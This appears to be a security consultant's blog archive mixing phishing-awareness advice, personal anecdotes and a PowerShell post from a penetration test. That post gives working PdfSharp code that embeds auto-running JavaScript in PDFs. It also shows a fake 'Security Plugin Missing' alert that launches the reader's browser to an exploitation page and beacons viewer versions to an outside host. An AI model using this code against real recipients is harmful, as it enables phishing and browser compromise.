Author: bluenotch

linkedin.com/in/jimshew

Imaginary Friends or Foe?

I know it’s 2023. But no, “imaginary friends” emailing you are dangerous.

I’m not talking about “catfishing” or “to catch a predator” and I’m definitely NOT talking about social media friends, influencer following, or bumping up your social’s followers here–although those are all valid “imaginary friends”. I’m pointing out the “old school” phishing scam emails where this invisible new digital friend wants to give you their fortune because you’re such a good person, befriends you, but in reality is asking for all your bank account info and any other items of value. Even better, you’ve gotten the “isn’t it oh so obvious your friend’s email has been hacked or spoofed” email and yet, you click the email to read it. (BTW it’s suspicious so why – why do you click the link? just delete it.)

PROTIP: If you use email message preview that usually gives you some hints it’s not a good email and you can delete it quicker.

Ahhh, but here you are 2023- you’ve clicked and automatically downloaded the morsel (worm, virus, etc.) your new friend has given you – it’s too late, right? Probably. Usually my “foe free” advice falls on deaf ears for any number of valid or invalid reasons. So yes, now you make a go for it – just throw your phone away, start that new Apple ID, and reorder all your credit cards … makes total sense.

I’ve firsthand reviewed or fixed so many work outlook, hotmail accounts, and laptops on this one thing alone. At least once a week the commanding language is the norm: “Change your password! Don’t click that! Don’t open that odd attachment!– yawn. With the built in junk mail problems too, I know several people that simply avoid email. But avoiding email at work, doesn’t work. (Well, maybe it does for some, but that’s another topic can of worms!)

I’m not pointing fingers here, just typing the truth, but the yearbook award of “most likely to succeed” goes to the C-suites opening up suspicious email and macro enabling those Word documents that set “fire” to the company email and servers. Subsequently, email servers can be down for days!? I’ve unplugged and disconnected infected machines, but then there’s the cloud/third party email – sigh, good times.

If it’s too late, you need an “IT Superhero” to save the day. If you’re being preventative as a business, you need a plan. This includes a security policy updated yearly, annual review/assessment, and ongoing EndUser training.

Lessons Learned and Still Too Many Stories to Tell.

Internet imaginary friends are not fun! You don’t want your own story to tell or yet another bamboozled account. Albeit everyone can share a similar woeful story of this email foe, your new digital “imaginary friend” you met from a phishing email will steer you wrong in reality.

Here’s some golden friendly advice, I’ll leave you with:

  1. FTCHow to Recognize, Avoid Phishing Scams, and What To Do
  2. SANS Security Awareness Training – Phishing
  3. IT Crowd” clip.

+ | shew |

  • by bluenotch

Cyber Defense Q & A

Meet James Shewmaker. James Shewmaker is the founder of and principal consultant at Bluenotch Corporation in Long Beach, California, which provides customized security services focusing on investigations, penetration testing, and analysis.

James authored and maintains the post-exploitation content in the SANS SEC660: Advanced Penetration Testing, Exploit Writing, and Ethical Hacking course. Before becoming a SANS Certified Instructor in 2009, his creative technical work led him on many adventures, including “The Great Translator Invasion of 2003.” Read more at: https://cyber-defense.sans.org/blog/2018/10/22/shewmaker

James Shewmaker of Bluenotch Corporation.

Find me @jimshew

Instructor for SANS courses https://www.sans.org/instructors/james-shewmaker

THE 2017 CHECKLIST

 

  • Updated logo
  • New website
  • Yearly duty – corporation tax prep ( excuse me while I hibernate and drowned in expense reports )
  • Make ten more checklist + reminder lists.

Happy New Year + Happy Groundhog Day.  You would be surprised how many *ahem* younger people do not know what I’m referring to when I say “alarm clock scene – Bill Murray Groundhog Day” ahhhh … and you guys can now “just Google it” on YouTube for instant gratification and add to your knowledge base category and tags – the cult epic movies that are referenced in other movies.  Circa 1993+ I had to record it on a VHS if I wanted to watch that scene again (and worse yet, only on a tube television – what mobile smart phone?!)

Yes.  I do wake up at 6am.  Groundhog Day can be classified as a real life documentary, right?

Groundhog Day Scene  HERE >

+ | shew |

Bye Bye 2015

In 2015, we drank a lot of Stumptown Coffee – roughly 900 homebrewed or take away cups and thirty 12oz whole bean bags bought.  It feuled a busy year as we worked around the world clock. We reminisced about the 2000s – everything from our involvment of Y2K radio reprogramming, The Great Translator Invasion, and the time the office got burglarized and the thieves took all the junk computers saved for an e-recycle drop off (yes!) and stole all the bottled water (shortage / drought in California?!) Needless to say, we have accumulated a lot of stories over the years.

In the cliché of looking back, I realize that there are a lot of projects and lists unfinished to complete in 2015 – two days left! Prioritizing critical events and client visits, come first over completing tasks like “You know < pause > I really need to update a wiki page!” or “Can we set up our twitter to amazon.com order?” And at the same time, those seem faster and easier to do in 10 minutes than what has been on our bucket lists. Anyone want to be an intern? Hah. I guess sipping coffee in 10 minutes became a priority and we had to put down the keyboard while drinking (fear of spillage).  All jokes aside, we look forward to 2016. Happy New Year.  + | shew |

+ I’ve been focused in 2015 on crafting malicious documents and VM forking.

It’s now been 10 years teaching at SANS Check out SEC660: Advanced Penetration Testing, Exploit Writing, and Ethical Hacking course and lead author Stephen Sims 

+ | jim.shew |

PowerShell

When trying to solve a problem, I try to use PowerShell.

During a recent penetration test, I wanted to upload malicious DOC, XLS, and PDF files. I looked around my favorite exploit frameworks:

Metasploit | http://www.metasploit.com
Nishang | https://github.com/samratashok/nishang
Exploit-db | http://www.exploit-db.com/
Core IMPACT | http://www.coresecurity.com/core-impact-pro
Social Engineer Toolkit | https://github.com/trustedsec/social-engineer-toolkit

Unfortunately the closest thing was an old Adobe Reader 8.x vintage embedded EXE exploit. I needed to write a payload into a PDF file that would be *interesting* (such as invoking a web browser). After a PDF API refresher, I decided to build it up from simple pieces. The subset of JavaScript that is available is only really supported in the Adobe readers, your-mileage-may-vary with other readers.

app.launchURL(‘http://bluenotch.com/collector.php?ver=’+app.viewerVersion,true);”

After some searching, I found Didier’s Steven’s work, realizing I should have looked there first. Didier has PDFid.py for summary analysis and mPDF.py to build it. I wanted to go the PowerShell route, however; all I could find is PDFSharp used for PowerShell print-to-PDF examples. I was surprised that nobody has published something similar to this.

Between a sample PDFSharp cmdlet for merging PDFs (http://mikepfeiffer.net/2010/03/how-to-merge-pdf-files-using-powershell-and-pdfsharp/) and this example to create JavaScript Elements in PDF in .Net (http://www.vo1dmain.info/pdfsharp-howto-inject-javascript-into-pdf-autoprinting-functionality), I have enough to work out a PowerShell solution. I still have Adobe’s JavaScript API specification for reference as well (http://www.adobe.com/content/dam/Adobe/en/devnet/acrobat/pdfs/js_api_reference.pdf).

A preliminary test script using the ideas above:

[string]$js = “app.alert(‘boom goes the reader ‘+app.reader);”,
[string]$msg = “Hello JS”,
[string]$filename = “C:\PDF\helloJS.pdf”

Add-Type -Path C:\pdf\PdfSharp-WPF.dll

$doc = New-Object PdfSharp.Pdf.PdfDocument
$doc.Info.Title = $js
$doc.info.Creator = “@jimshew”
$page = $doc.AddPage()

$dictjs = New-Object PdfSharp.Pdf.PdfDictionary
$dictjs.Elements[“/S”] = New-Object PdfSharp.Pdf.PdfName (“/JavaScript”)
$dictjs.Elements[“/JS”] = New-Object PdfSharp.Pdf.PdfStringObject($doc, $js);
$doc.Internals.AddObject($dictjs)

$dict = New-Object PdfSharp.Pdf.PdfDictionary
$pdfarray = New-Object PdfSharp.Pdf.PdfArray
$embeddedstring = New-Object PdfSharp.Pdf.PdfString(“EmbeddedJS”)

$dict.Elements[“/Names”] = $pdfarray
$pdfarray.Elements.Add($embeddedstring)
$pdfarray.Elements.Add($dictjs.Reference)
$doc.Internals.AddObject($dict)

$dictgroup = New-Object PdfSharp.Pdf.PdfDictionary
$dictgroup.Elements[“/JavaScript”] = $dict.Reference
$doc.Internals.Catalog.Elements[“/Names”] = $dictgroup

$doc.Save($filename)

On open of the PDF (modern reader with no settings changes ):

blogpdfjspopup

Great, now we can taunt the victim, but what about something more interesting, like making external requests?

$js = “app.alert(‘Security Plugin Missing, Launching installer’);app.LaunchURL(‘http://bluenotch.com/pwn.php’,true);”
$msg = “Security Plugin FAIL”,
$filename = “C:\PDF\helloHTTP.pdf”

blogpdfjspluginwarning

Followed by:

blogpdfredirectallow

So it’s easy to see how we can leverage this in a phishing or social engineering attack. In one of the recent assessments, the web portal that housed the PDFs was whitelisted so it didn’t even prompt for the URL redirect! Now it’s ripe for a Browser Exploitation Framework (BeEF) hook or Metasploit browser autopwn.

I’m still exploring the modern PDF functionality to build creative payloads that work on modern readers. One of those features is the form submit functionality, used by the sample webug-reader.pdf in Origami (see work by Frédérick Raynal and Guillaume Delugré  below).

I’ll be turning this into a proper PowerShell module soon, (assuming my battery holds out during the next series of flights). For more info along PDF hijinks, you may want to check out:

Origami – a framework for generating malicious PDFs:
http://www.security-labs.org/fred/docs/pacsec08/pacsec08-fr-gd-full.pdf
https://code.google.com/p/origami-pdf/

Online PDF analyzer:
http://wepawet.iseclab.org/index.php

You probably want to check what app.launchURL destinations are already allowed, here is mine after checking the remember box on the HelloHTTP.pdf :

[HKEY_USERS\S-1-5-21-3430783995-1949563973-3828160469-1001\Software\Adobe\Acrobat Reader\11.0\TrustManager\cDefaultLaunchURLPerms]

“tHostPerms”=”version:2|akeo.ie:2|amazon.com:2|bluenotch.com:2|cdw.com:2|crucial.com:2”

+ | jimshew |

Summer of 1999

I was living in southern Idaho

and back then, it meant a requirement to travel. I was just starting a radio internship at a network of stations – format of rock / alt indie and quickly headed to full time work there.  Yes, hours of fun, shows, tours, etc. But still needed California vacation time. So yes, 60-80 hours a week in a closet size studio and the need to visit my home, Southern California was a priority. Granted Idaho has great white water rivers and white powder snow capped mountains, but still – surf, sand, and retail sunshine were missing.

The gateway medium?  Electronic plane tickets via Expedia and Hotmail. Both I didn’t have yet.  So I signed up for a Hotmail account via Internet Explorer. Awwww … I miss those early Passport MSN Messenger – IM and “one new message” bar sounds – nostalgia. Back to rewind, 1999, okay so not everyone had Hotmail yet – mostly Yahoo or AOL and Microsoft recently acquired Hotmail.  I still had a difficult time getting my third choice account name.  So brainbending – one simple combo was available! Full first name and last initial. Two minutes later done registering to welcome email arrives. Step two – I start to book Expedia … Need an account. My email is already registered?!? What? Okay …. “Forgot password.” Send. You didn’t fail to read the title here, summer of 1999, right? Just checking. Well despite me not caring about the why it was a registered email user account < look, I had late nights, not yet a daily straight up espresso drinker, and really did not think much of it. It was highly likely and logical that I started an account process and forgot to finish one late night > I waited – The Password emailed to me… Some vacationy type password. Again, highly likely I made it that password – no red flag. Odd right? But true. The password was five characters long. High Five.  I  think about a month later, I forgot the password … Reset and added a “1” Good job? Yes this means more out of town trips were booked. 

A couple months later I get an email from the old Hotmail user letting me know it was once his, but he’s “moved on.” < bitter much >  And I think we even might of mentioned my hijack of Expedia. Laugh. He had a similar name, lived in Washington state and was a computer nerd of some sort. I still recall his name and he emailed me several years back again just to say hi … Ahem or try to get his email back.  I just looked him up on LinkedIn – Senior Infosec Engineer, now lives in Utah.  Look it was free Risk-game type takeover. In the words of Seinfeld’s Kramer, “The Ukraine is weak.”  + | shew | 

Same year, same station, different channel role

It was my job, nay duty, to encourage user security awareness. My favorite technique was to “baggy pants” anyone leaving their email open. They would return to their desk and find an email (from themselves) declaring how cool they are and how their pants are the baggiest.  Or a claim that their password was weak and they should change it …+ | jimshew |

P.S. Irony – I was a victim of such ^^ email shenanigans ^^  . + | shew |

Cybersecurity thoughts on Presidents’ Day

In January 2008, the Bush Administration established the Comprehensive National Cybersecurity Initiative (CNCI).  Recently, the Obama Administration released several notices on cybersecurity, below is an Executive Order.

By the authority vested in me as President by the Constitution and the laws of the United States of America, it is hereby ordered as follows: 

Section 1. Policy. In order to address cyber threats to public health and safety, national security, and economic security of the United States, private companies, nonprofit organizations, executive departments and agencies (agencies), and other entities must be able to share information related to cybersecurity risks and incidents and collaborate to respond in as close to real time as possible.

Continue reading here http://www.whitehouse.gov/the-press-office/2015/02/13/executive-order-promoting-private-sector-cybersecurity-information-shari

It is of note, during this White House Summit held at Stanford University, CEOs from Google, Yahoo, Facebook – absent. Tim Cook, Apple CEO, attended.

SMALL TALK  On a coffee + laptop observational side note:  I was at a coffeebar on Saturday and there were only Macs everywhere.  Yes, I did the 360 check while waiting for my Americano-latte.  It’s like you could only stay and drink coffee if you owned an Apple product … and sign on the Square POS iPad (which can we agree we love / hate the emailed receipt?!).  So apparently, if I bring my ThinkPad, I might need to trek down to other coffeeshop down the street – they use an older school Point of Sale system and have the most amazing hazelnut gelato.  + | shew |

Five Year Plan

SMALL TALK    I’m working on my five year plan, just trying to figure out the font.  < that’s a line in the pilot episode of Chuck >  I’ll be honest, that was the funniest line, made me laugh and I’ve used it as a tag line — but I never watched past the pilot episode (nor ever used Geek Squad).   +  | shew |

Since we’re on a television tangent … Just saw esxi console on Blacklist, now I *know* it’s a documentary. + | james.shew |

© 2024 BLUENOTCH. Designed by Quema Labs.